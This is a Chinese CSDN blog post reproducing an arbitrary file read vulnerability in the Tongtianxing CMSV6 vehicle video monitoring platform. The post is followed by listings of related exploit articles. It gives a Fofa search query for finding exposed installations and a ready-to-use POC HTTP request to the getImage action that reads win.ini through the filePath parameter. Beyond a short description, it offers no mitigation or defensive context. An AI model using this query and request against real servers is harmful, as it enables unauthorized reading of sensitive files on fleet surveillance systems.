【漏洞复现】通天星CMSV6车载监控平台getImage文件读取漏洞

最新推荐文章于 2024-06-11 17:37:07 发布
最新推荐文章于 2024-06-11 17:37:07 发布
阅读量80 收藏
点赞数
分类专栏: 【漏洞复现】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138175717
版权

漏洞描述:

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队,专注于为定位、无线视频终端产品提供平台服务,通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台存在getImage文件读取漏洞,攻击者可以利用此漏洞读取服务器文件信息,造成敏感信息泄露等安全问题。

搜索语法:

Fofa-Query: web.body="/808gps/"

漏洞详情:

1.通天星CMSV6车载视频监控平台。

2.漏洞POC:

POST /808gps/StandardReportMediaAction_getImage.action?filePath=C://Windows//win.ini&fileOffset=1&fileSize=100 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Connection: close
Content-Length: 0
Accept-Encoding: gzip

3.漏洞复现结果。

晚风不及你ღ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现天星CMSV6车载监控平台Login弱口令漏洞
晚风不及你
04-25 38
天星CMSV6车载视频监控平台存在弱口令漏洞,导致攻击者过此漏洞登录系统获取敏感信息。
漏洞复现天星CMSV6车载监控平台SQL注入漏洞
晚风不及你
01-05 675
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
极危!XZ Utils 5.6.0/5.6.1版本恶意后门植入漏洞风险
亚信安全官方账号的博客
04-01 1741
前日,亚信安全CERT监测到 XZ Utils 5.6.0、5.6.1版本存在恶意后门植入漏洞。攻击者可能利用该漏洞在受影响的系统上绕过SSH的认证获得未授权访问权限,执行任意代码,请相关用户立即采取安全措施!
爬虫必须要了解的请求头 user-agent
11-26 5430
前言 在现在 Python 最火的时代,有一门技术已经被广泛宣传了 -- 爬虫 那爬虫是什么呢?它是按照一定的规则,自动地抓取网络上信息的程序或者脚本 举个简单的例子,腾讯新闻网站上,有统计全国各地的疫情情况 这些疫情,是怎么汇总的呢? 如果只是靠人工手动去收集,那耗费的人力物力将非常的庞大。 那具体该怎么做呢? 其实,这个就是过爬虫技术,写好脚本,到国家卫健委的官网上以及各个城市的卫健委的官网上去获取到的数据,然后进行归纳总结。 Ps:爬虫技术好,但是不要去触犯法律哟 既然爬虫能获取到网上的各种信息
Python-爬虫基础
Snail的博客
09-18 240
一只小爬虫的开端开篇有些话本章内容实现爬虫的步骤第一步:获取页面第二步:提取所需要的数据第三步:储存数据整体代码 开篇有些话 爬虫,你创造它,它给予你! 我的爬虫是参考着唐松作者的《Python网络爬虫从入门到实践》学习的 学习网站:www.santostang.com 本章内容 实现爬虫的步骤 第一步:获取页面 爬虫获取页面的步骤我分为如下几点: 明确你所要获取页面的域名 // 本次要获取的页面是:www.santostang.com url ="http://www.santostang.com
【XSS漏洞-01】XSS漏洞原理和危害及验证与分类
cc
02-10 7868
反射型XSS不与数据库进行交互,直接由前端进行反馈;存储型XSS会将恶意代码写进服务器的数据库中;反射型和存储型xss都先将数据发送到了服务器,再从服务器读取数据显示到页面中,burp能抓取到数据;DOM型XSS主要是在浏览器本地修改DOM树而执行,并不会经过服务器,所以burp抓取不到包。
天星CMSV6车载视频监控平台 getImage 任意文件读取漏洞复现
0xSec
02-26 1078
天星CMSV6车载视频监控平台StandardReportMediaAction_getImage.action接口处任意文件读取漏洞,未经身份认证的攻击者可以过此漏洞获取系统内部敏感文件信息,使系统处于极不安全状态。
漏洞复现天星CMSV6车载监控平台getImage任意文件读取漏洞
晚风不及你
03-04 698
深圳市天星科技有限公司,是一家以从事计算机、信和其他电子设备制造业为主的企业。天星车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交上。
74cms v4.2.X任意文件读取漏洞
09-06
影响版本: 74cms v4.2. 74cms v4.2 74cms v4.2.3 74cms v5.0.1 有任意删除文件漏洞和SQL漏洞,有poc的复现过程。
74CMS_4.2.3_任意文件读取_CNVD-2017-26183
02-22
本文为 漏洞编号CNVD-2017-26183 ,即 74CMS 任意文件读取漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更多...
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
eyoucms V1.0.4 后台任意文件读取漏洞1
08-03
漏洞简介:易优cms企业建站系统是由php+mysql开发的一套专门用于中小企业网站建设的开源cms。可以用来快速建设一个企业网站( PC,手机,微信都可以访问
bagecms V3.1.3 后台任意文件读取漏洞1
08-03
漏洞简介:BageCMS是一套基于PHP和MySQL的跨平台的内容管理系统(CMS)。管理功能过滤不严导致任意文件读取漏洞。##漏洞分析在文件 www\prot
网络安全(补充)
m0_62207482的博客
06-11 296
同步包风暴(SYN Flood)攻击者假造源网址发送多个同步数据包(SYN Packet)给服务器,服务器因无法收到确认数据包(ACK Packet),使TCP/IP协议三次握手无法顺利完成,因而无法建立连接。其原理是发送大量半连接状态的服务请求,使服务主机无法处理正常的连接请求,因而影响正常运作 泪滴攻击暴露出IP数据包分解与重组的弱点,当IP数据包在网络中传输时,会被分解成许多不同的包传送,并借由偏移量字段作为重组的依据。泪滴攻击过加入过多或不必要的偏移量字段,使计算机系统重组错乱,产生不可预期的后
数字时代网络安全即服务的兴起
最新发布
网络研究观
06-11 421
网络安全即服务是一种过基于云的服务来管理安全需求的综合方法。
CISA网络安全事件应急手册
INSBUG的博客
06-11 399
在上述的威胁指标中,有经验的对手或者攻击方的原子指标会经常变化,比如更换IP地址池或计算设备(比如僵尸网络、C2服务器等),因此原子指标存在有效期,甚至有效期很短,另外还有的对手或攻击方本身长期潜伏在受害者的资产中,很难获取其原子指标。基础设施包括具备遏制、复制、分析、重组和记录受攻击主机的能力,具备电子取证和取证数据收集的能力,具备恶意软件处理的手段以及用于恶意软件分析的工具和沙盒工具,且能够为事件相关数据和保存建立安全存储(即只有事件响应人员才能访问)。
【网络安全的神秘世界】Kali 自带 Burp Suite 使用指南:字体与CA证书设置详解等
weixin_54750312的博客
06-11 689
在访问后的搜索框内搜索 network.proxy.allow_hijacking_localhost,点击确认之后,将值改为true。点击菜单栏中的“User options”—> “Display”下的“Font size”选项来调整字体大小。同时,还可以在“HTTP Message Display”下的“Font”选项中,设置抓包数据的文字大小;导入CA证书:选项----高级----证书----查看证书----导入。OK,可以正常抓取https的数据包了,但是发现还抓不到不到本地包。
【网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1279
web攻击的本质,就是过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
网络安全中攻击溯源方法
2301_76786857的博客
05-29 1346
攻击溯源可以帮助用户对攻击放进行锁定放入数据库,可以帮助其他用户进行态势感知,同时可以协调相关组织打击违法犯罪行为,避免下一次的攻击。2、分析攻击特征:过分析攻击事件的特征,如攻击方式、攻击时间、攻击目标等,来确定攻击类型和攻击者的特点。4、分析攻击工具:过分析攻击者使用的工具、恶意代码等,确定攻击者的攻击技术和水平,进而锁定攻击者身份。5、建立攻击链路:过对攻击事件的各个环节进行分析,建立攻击链路,找到攻击者入侵的路径和方法。1、收集证据:收集攻击事件的各种证据,包括日志、网络数据包、磁盘镜像等。
帝国cms7.5垂直越权漏洞复现
01-02
根据提供的引用内容,帝国CMS 7.5版本及之前版本存在一个垂直越权漏洞过修改数据库表名可以实现任意代码执行。下面是帝国CMS 7.5垂直越权漏洞复现步骤: 1. 使用管理员账户登录帝国CMS后台。 2. 访问以下URL:`/e/admin/admin/ebak/phome.php`。 3. 在URL中修改数据库表名,以实现任意代码执行。 请注意,这是一个漏洞复现的示例,仅用于安全研究和教育目的。在实际环境中,请遵循合法和道德的行为准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值